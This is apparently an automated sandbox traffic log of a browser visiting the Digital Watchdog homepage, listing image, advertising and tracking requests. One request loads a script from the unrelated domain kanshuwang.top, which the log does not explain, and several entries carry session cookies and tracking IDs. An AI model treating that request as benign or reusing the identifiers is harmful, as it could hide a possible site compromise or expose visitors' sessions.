    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Software_01.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Software_03.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20240926103313dp2042930829.png HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/Software_02.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220614101054dp2142766226.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/456244667/?random=1748615717986&cv=11&fst=1748615717986&bg=ffffff&guid=ON&async=1&gtm=45be55s2v899007962za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&ptag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&u_w=1280&u_h=1024&url=https%3A%2F%2Fdigital-watchdog.com%2F&hn=www.googleadservices.com&frm=0&tiba=Digital%20Watchdog%20l%20Welcome&npa=0&pscdl=noapi&auid=2004574435.1748615718&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /p/action/187184346.js HTTP/1.1host: bat.bing.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/ig_icon_orange.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /product_detail_assets/Clearance_Zone_button.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _ga=GA1.1.1634229778.1748615718; _gcl_au=1.1.2004574435.1748615718
    Source: global trafficHTTP traffic detected: GET /admin/assets/_medialibrary/20250414151519dp875346491.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _gcl_au=1.1.2004574435.1748615718; _ga=GA1.2.1634229778.1748615718; _gid=GA1.2.1345043303.1748615719; _gat_gtag_UA_47457883_1=1
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/Starlight_Banner.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://digital-watchdog.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220616061510dp1783973937.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://digital-watchdog.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /i/fa-angle-down-dark.png HTTP/1.1Host: digital-watchdog.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=184bidui4qof6vqlru0f51jf2c; DW_HOME_VISIT_COUNT=0; home-page-alert=eE1HVVJaSm8zV01tTkw2RFV4bFNOcUV1SllvK0RMVEVEdmNrcTlSUWZ0ND0%3D; _ga_M0RPWMLFQV=GS2.1.s1748615717$o1$g0$t1748615717$j60$l0$h754319222; _gcl_au=1.1.2004574435.1748615718; _ga=GA1.2.1634229778.1748615718; _gid=GA1.2.1345043303.1748615719; _gat_gtag_UA_47457883_1=1
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/DW-Blackjack-Ai_Banner_Rav2.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /.well-known/protected-auction/v1/public-keys HTTP/1.1host: publickeyservice.pa.aws.privacysandboxservices.comsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i
    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/456244667/?random=1748615717986&cv=11&fst=1748613600000&bg=ffffff&guid=ON&async=1&gtm=45be55s2v899007962za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&ptag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&u_w=1280&u_h=1024&url=https%3A%2F%2Fdigital-watchdog.com%2F&hn=www.googleadservices.com&frm=0&tiba=Digital%20Watchdog%20l%20Welcome&npa=0&pscdl=noapi&auid=2004574435.1748615718&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyzHEo5Jl821JYTm9Q1NLSPTNufnW0o-Q&random=2757604426&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstd
    Source: global trafficHTTP traffic detected: GET /.well-known/protected-auction/v1/public-keys HTTP/1.1host: publickeyservice.pa.gcp.privacysandboxservices.comsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i
    Source: global trafficHTTP traffic detected: GET /action/0?ti=187184346&Ver=2&mid=5088c6c0-5d7d-4b34-b794-b98e9d1c06cf&bo=1&sid=4f7948503d6311f0829297dbae7d1642&vid=4f79a7e03d6311f09b8ff13ac978d915&vids=1&msclkid=N&uach=pv%3D10.0.0&pi=918639831&lg=en-US&sw=1280&sh=1024&sc=24&tl=Digital%20Watchdog%20l%20Welcome&kw=DW%C2%AE%20%7C%20Complete%20Video%20Surveillance%20Solutions%3C%2Ftextarea%3E&p=https%3A%2F%2Fdigital-watchdog.com%2F&r=&lt=3917&evt=pageLoad&sv=1&cdb=AQAQ&rn=732091 HTTP/1.1host: bat.bing.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1host: connect.facebook.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /homepage_assets/DW_Spectrum_IPVMS.png HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220907225015dp254308958.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /ls/index.js?c531fe8f142fa15351 HTTP/1.1Host: kanshuwang.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/456244667/?random=1748615717986&cv=11&fst=1748613600000&bg=ffffff&guid=ON&async=1&gtm=45be55s2v899007962za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&ptag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&u_w=1280&u_h=1024&url=https%3A%2F%2Fdigital-watchdog.com%2F&hn=www.googleadservices.com&frm=0&tiba=Digital%20Watchdog%20l%20Welcome&npa=0&pscdl=noapi&auid=2004574435.1748615718&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyzHEo5Jl821JYTm9Q1NLSPTNufnW0o-Q&random=2757604426&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /signals/config/767361503973632?v=2.9.203&r=stable&domain=digital-watchdog.com&hme=36c7454c4b078660353e5d4c89e3eaca439a56e5c3ceaadddff6c79ae427835a&ex_m=74%2C128%2C113%2C117%2C65%2C6%2C106%2C73%2C19%2C101%2C93%2C55%2C58%2C183%2C204%2C211%2C207%2C208%2C210%2C32%2C107%2C57%2C81%2C209%2C178%2C181%2C205%2C206%2C191%2C140%2C45%2C196%2C193%2C194%2C37%2C152%2C18%2C54%2C200%2C199%2C142%2C21%2C44%2C2%2C47%2C69%2C70%2C71%2C75%2C97%2C20%2C17%2C100%2C96%2C95%2C114%2C56%2C116%2C42%2C115%2C33%2C98%2C43%2C90%2C29%2C179%2C182%2C149%2C14%2C15%2C16%2C8%2C9%2C28%2C25%2C26%2C61%2C66%2C68%2C79%2C105%2C108%2C30%2C80%2C12%2C10%2C84%2C52%2C24%2C110%2C109%2C111%2C102%2C13%2C23%2C4%2C41%2C78%2C22%2C161%2C136%2C77%2C1%2C99%2C60%2C88%2C36%2C31%2C86%2C87%2C92%2C40%2C7%2C94%2C85%2C48%2C35%2C38%2C0%2C72%2C118%2C91%2C5%2C51%2C50%2C89%2C248%2C176%2C126%2C164%2C157%2C3%2C39%2C67%2C46%2C112%2C49%2C83%2C64%2C63%2C34%2C103%2C62%2C59%2C53%2C82%2C76%2C27%2C104%2C11%2C119 HTTP/1.1host: connect.facebook.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/DW-Built-for-users_Banner.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/DW_Spectrum_logo_reverse.png HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220609044336dp295005725.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /tag/uet/187184346 HTTP/1.1host: www.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/0.8.9/clarity.js HTTP/1.1host: www.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: CLID=2cecd242b96d4edf80305b10a249452c.20250530.20260530
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220614101054dp2142766226.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /tr/?id=767361503973632&ev=PageView&dl=https%3A%2F%2Fdigital-watchdog.com%2F&rl=&if=false&ts=1748615719975&sw=1280&sh=1024&v=2.9.203&r=stable&ec=0&o=12318&fbp=fb.1.1748615719969.679263426248015277&ler=empty&cdl=API_unavailable&it=1748615719584&coo=false&exp=k2&rqm=GET HTTP/1.1host: www.facebook.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/img/banner/DW_SiteWatch_HPBanner_with_video.mp4 HTTP/1.1host: dmq883log67hn.cloudfront.netsec-ch-ua-platform: "Windows"accept-encoding: identity;q=1, *;q=0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: videosec-fetch-storage-access: activeaccept-language: en-US,en;q=0.9range: bytes=0-priority: i
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/topics/registration/?id=767361503973632 HTTP/1.1host: www.facebook.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-browsing-topics: ();p=P0000000000000000000000000000000origin: https://digital-watchdog.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
    Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=767361503973632&ev=PageView&dl=https%3A%2F%2Fdigital-watchdog.com%2F&rl=&if=false&ts=1748615719975&sw=1280&sh=1024&v=2.9.203&r=stable&ec=0&o=12318&fbp=fb.1.1748615719969.679263426248015277&ler=empty&cdl=API_unavailable&it=1748615719584&coo=false&exp=k2&rqm=FGET HTTP/1.1host: www.facebook.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8attribution-reporting-eligible: trigger=navigation-source, event-sourceattribution-reporting-support: not-os, websec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
    Source: global trafficHTTP traffic detected: GET /assets/_medialibrary/20220708113233dp1880617416.jpg HTTP/1.1host: dmq883log67hn.cloudfront.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
